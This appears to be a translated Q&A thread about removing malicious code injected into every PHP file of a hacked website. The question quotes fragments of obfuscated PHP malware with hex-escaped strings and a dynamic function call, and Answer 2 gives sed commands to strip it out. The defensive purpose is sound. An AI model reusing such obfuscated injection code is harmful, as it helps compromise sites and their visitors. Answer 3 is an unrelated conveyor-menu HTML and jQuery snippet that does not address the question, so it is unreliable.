Question

我的网站被黑了。在每个php文件中都添加了一行代码。我不会在这里发布完整的代码，但它始于：

<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $yudqgxmnlr =

并以：

结束

 $gzagexgpdc=substr($yudqgxmnlr,(34129-24016),(83-71)); $gzagexgpdc($xarchajboj, $ukumkvvgai, NULL); $gzagexgpdc=$ukumkvvgai; $gzagexgpdc=(759-638); $yudqgxmnlr=$gzagexgpdc-1; ?>

我已尝试查找并替换一些ssh命令，但它似乎无法正常工作。（阅读：我缺乏ssh知识会妨碍你。）

这是我最近的尝试：

sed -i '<?php if(!isset*gzagexgpdc-1; ?>//g’ *.php

任何人都可以帮助我吗？

Answer 1

您可以尝试：https://github.com/daniyalahmadk/RMCI

只需将该代码放入框并点击提交，它将从文件中搜索代码并将其全部删除。

Answer 2

您需要在开始时添加s/。

sed 's/<?php if(\!isset.*gzagexgpdc-1; ?>//g' *.php

OR

sed -r 's/<\?php if\(!isset.*gzagexgpdc-1; \?>//g' *.php

添加-i参数以保存所做的更改。

Answer 3

这应该有用。

<li class='has-sub'><a href='Products.html'><span>Products</span></a>
 <ul>
     <li class='has-sub'><a href='Conveyors.html'><span>Converyors</span></a>
         <ul>
             <li><a href="Conveyors.html#screwcon-content"><span>Screw Conveyors</span></a></li>
             <li><a href="Conveyors.html#beltcon-content"><span>Belt Conveyors</span></a></li>
             <li><a href="Conveyors.html#idler-content"><span>Idler Rollers</span></a></li>
             <li class='last'><a href="Conveyors.html#rollerpulley-content"><span>Rollers and Pulleys</span></a></li>
          </ul>
        </li>
   <li class='has-sub'><a href='BucketElevators.html'><span>Bucket Elevators</span></a>
                                <ul>
                                   <li><a href='BucketElevators.html#beltbucket-content'><span>Belt Type</span></a></li>
                                   <li class='last'><a href='BucketElevators.html#chainbucket-content'><span>Chain Type</span></a></li>
                                </ul>
                            </li>
                            <li class='has-sub'><a href='OtherProducts.html'><span>Other Products</span></a>
                                <ul>
                                    <li><a href='OtherProducts.html#grindingmills-content'><span>Grinding Mills</span></a></li>
                                    <li><a href='OtherProducts.html#feeders&screens-content'><span>Feeders & Screens</span></a></li>
                                    <li><a href='OtherProducts.html#crushers-content'><span>Crushers</span></a></li>
                                    <li><a href='OtherProducts.html#kilns-content'><span>Kilns</span></a></li>
                                    <li><a href='OtherProducts.html#airslides-content'><span>Air Slides</span></a></li>
                                    <li class='last'><a href='OtherProducts.html#classifier-content'><span>Classifier</span></a></li>
                                </ul>
                            </li>
                        </ul>
                    </li>


Html for Conveyors.html
<div id="products-verticalbar">
        <h1> Conveyors </h1>
        <ul id="sidemenu"> 
            <li> <a href="#screwcon-content" class="open">Screw Conveyors</a> </li>
            <li> <a href="#beltcon-content" id="tab1">Belt Conveyors</a> </li>
            <li> <a href="#idler-content">Idler Rollers</a> </li>
            <li> <a href="#rollerpulley-content">Rollers and Pulleys</a> </li>
        </ul>

        <div id="conveyor-content">
            <div id="screwcon-content" class="contentblock">

            <p>A screw conveyor or auger conveyor is a mechanism that uses a rotating helical screw blade, called a "flighting", usually within a tube, to move liquid or granular materials. They are used in many bulk handling industries. Screw conveyors in modern industry are often used horizontally or at a slight incline as an efficient way to move semi-solid materials, including food waste, wood chips, aggregates, cereal grains, animal feed, boiler ash, meat and bone meal, municipal solid waste, and many others. The first type of screw conveyor was the Archimedes' screw, used since ancient times to pump irrigation water.</p>
            <img src="IMAGES/Screwcon.jpg"/>
            </div>

            <div id="beltcon-content" class="contentblock hidden">
            <p>A conveyor belt is the carrying medium of a belt conveyor system (often shortened to belt conveyor). A belt conveyor system is one of many types of conveyor systems. A belt conveyor system consists of two or more pulleys (sometimes referred to as drums), with an endless loop of carrying medium—the conveyor belt—that rotates about them. One or both of the pulleys are powered, moving the belt and the material on the belt forward. The powered pulley is called the drive pulley while the unpowered pulley is called the idler pulley. There are two main industrial classes of belt conveyors; Those in general material handling such as those moving boxes along inside a factory and bulk material handling such as those used to transport large volumes of resources and agricultural materials, such as grain, salt, coal, ore, sand, overburden and more.</p>
            <img src="IMAGES/beltconveyor.jpg"/> 
            </div>
            <div id="idler-content" class="contentblock hidden"> </div>
            <div id="rollerpulley-content" class="contentblock hidden"> </div>
        </div>
    </div>  

Script:
$(function(){
  $('#sidemenu a').on('click', function(e){
    e.preventDefault();

    if($(this).hasClass('open')) {
      // do nothing because the link is already open
    } else {
      var oldcontent = $('#sidemenu a.open').attr('href');
      var newcontent = $(this).attr('href');

      $(oldcontent).fadeOut('fast', function(){
        $(newcontent).fadeIn().removeClass('hidden');
        $(oldcontent).addClass('hidden');
      });


      $('#sidemenu a').removeClass('open');
      $(this).addClass('open');
    }
  });
});

网站遭到攻击，如何使用SED / GREP删除恶意代码

3 个答案: